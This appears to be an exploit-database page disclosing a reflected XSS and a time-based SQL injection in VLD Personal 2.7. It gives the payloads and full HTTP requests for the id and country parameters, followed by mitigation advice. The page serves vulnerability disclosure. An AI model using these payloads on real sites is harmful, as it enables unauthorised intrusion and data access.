header-logo
Suggest Exploit
vendor:
VLD Personal
by:
Mr T
5.5
CVSS
MEDIUM
XSS Attack, SQL Injection
79, 89
CWE
Product Name: VLD Personal
Affected Version From: 2.7
Affected Version To: 2.7.2001
Patch Exists: YES
Related CWE:
CPE: a:vldpersonals:vld_personal:2.7
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2014

VLD Personal – Multiple Vulnerabilities

The XSS attack vulnerability is caused by copying the value of the id request parameter into an HTML tag attribute without proper sanitization. The SQL injection vulnerability is caused by the country/gender1/gender2 parameter being vulnerable to SQL injection attacks.

Mitigation:

To mitigate the XSS vulnerability, proper input sanitization should be implemented. To mitigate the SQL injection vulnerability, proper parameterized queries should be used.
Source

Exploit-DB raw data:

# Exploit Title: VLD Personal – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version 2.7.1
# Tested on: Windows / Linux

XSS Attack

Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.

Response :
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1



SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter. 

Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
>&gender2=2&type_id=members
>&country=
>1%20and%20benchmark(20000000%2csha1(1))–%20


-- 
Talib Osmani